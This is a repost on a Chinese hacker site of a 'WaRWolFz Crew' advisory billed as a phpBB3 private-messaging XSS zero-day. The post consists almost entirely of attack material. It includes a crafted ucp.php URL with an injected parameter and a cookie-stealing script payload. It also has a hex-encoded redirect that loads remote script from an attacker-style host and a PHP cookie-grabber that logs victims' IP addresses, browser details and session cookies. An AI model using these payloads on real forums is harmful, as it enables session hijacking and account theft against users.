|
 |
您现在的位置: 红色黑客联盟 >> 教程 >> 黑客技术 >> 漏洞利用 >> 正文 |
| XSS Private Messagging On PhpBB3(0day) |
|
|
|
| 文章录入:7747.Net 责任编辑:7747.Net |
|
|
【字体:小 大】 |
|
################################################## ####################################
# #
# Authors: Dante90, WaRWolFz Crew #
# T0T4L, Ex Member Crew #
# Title: XSS Private Messagging On PhpBB3 By Dante90 [0-Day & Priv8] #
# MSN: dante90.dmc4@hotmail.it #
# Web: www.warwolfz.org #
# Description: XSS (Cross Site Scripting), Grab Status: 100%. #
# #
################################################## ####################################
XSS Private Messagging On PhpBB3 By Dante90 [0-Day & Priv8]
程序代码:
http://TRAGET/ucp.php?i=pm&mode=compose&action=reply&f=[xss]&p=6779
Where is:
程序代码:
[xss] = '';!--"<script>alert(document.cookie);</script>=&{(alert(1))}
Redirect Code [Ascii --> Hex]:
程序代码:
[xss] = %3c%73%63%72%69%70%74%20%73%72%63%3d%68%74%74%70%3 a%2f%2f%77%77%77%2e%65%76%69%6c%73%69%74%65%2e%6f% 72%67%2f%66%69%6c%65%2e%6a%73%3e
(<script src=http://www.evilsite.org/WaRWolFz/file.js>)
Cookies grabber:
程序代码:
<?php
$ip = $_SERVER['REMOTE_ADDR'];
$referer = $_SERVER['HTTP_REFERER'];
$agent = $_SERVER['HTTP_USER_AGENT'];
$data = $_GET['warwolfz'];
$time = date("Y-m-d G:i:s A");
$text = "Time: ".$time."\nIP:".$ip."\nReferer:".$referer."\nU ser-Agent:".$agent."\nCookie:".$data."\n\n";
$file = fopen('cookies.html' , 'a');
fwrite($file,$text);
fclose($file);
?> |
| |
| 您对本文章有什么意见或着疑问吗?请到论坛讨论您的关注和建议是我们前行的参考和动力 |
|
|
| |
上一篇文章: discuz最新漏洞利用程序
下一篇文章: 没有了 |
| 【发表评论】【加入收藏】【告诉好友】【打印此文】【关闭窗口】 |
